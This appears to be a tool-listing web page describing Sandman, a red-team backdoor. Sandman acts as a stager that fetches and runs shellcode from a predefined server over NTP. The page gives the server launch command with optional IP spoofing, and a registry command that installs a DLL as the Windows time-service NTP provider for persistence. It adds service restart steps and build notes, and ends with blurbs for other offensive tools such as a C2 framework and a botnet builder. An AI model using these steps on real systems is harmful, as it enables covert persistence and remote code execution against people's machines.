Sandman is a backdoor that is meant to work on hardened networks during red team engagements.
Sandman works as a stager and leverages NTP (a protocol to sync time & date) to get and run an arbitrary shellcode from a pre-defined server.
Since NTP is a protocol that is overlooked by many defenders resulting in wide network accessibility.
Run on windows / *nix machine:
python3 sandman_server.py "Network Adapter" "Payload Url" "optional: ip to spoof"
To start, you can compile the SandmanBackdoor as mentioned below, because it is a single lightweight C# executable you can execute it via ExecuteAssembly, run it as an NTP provider or just execute/inject it.
To use it, you will need to follow simple steps:
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\W32Time\TimeProviders\NtpClient" /v DllName /t REG_SZ /d "C:\Path\To\TheDll.dll"
sc stop w32time sc start w32time
NOTE: Make sure you are compiling with the x64 option and not any CPU option!
To compile the backdoor I used Visual Studio 2022, but as mentioned in the usage section it can be compiled with both VS2022 and CSC. You can compile it either using the USE_SHELLCODE and use Orca’s shellcode or without USE_SHELLCODE to use WebClient.
To compile the backdoor I used Visual Studio 2022, you will also need to install DllExport (via Nuget or any other way) to compile it. You can compile it either using the USE_SHELLCODE and use Orca’s shellcode or without USE_SHELLCODE to use WebClient.
The ps5Spoofer is a tool designed for the PlayStation 5 (PS5) that patches the PS4…
The eWPTX (eLearnSecurity Web Application Penetration Tester Extreme) certification is a challenging credential that validates…
REC2, short for Rusty External Command and Control, is a sophisticated Command and Control (C2)…
AMSI (Antimalware Scan Interface) is a Windows feature designed to help protect systems from malware…
Xkeys is a Burp Suite extension designed to extract interesting strings such as keys, secrets,…
DEDSEC_BOTNET is a Linux-based tool designed for creating and managing advanced botnet payloads. It is…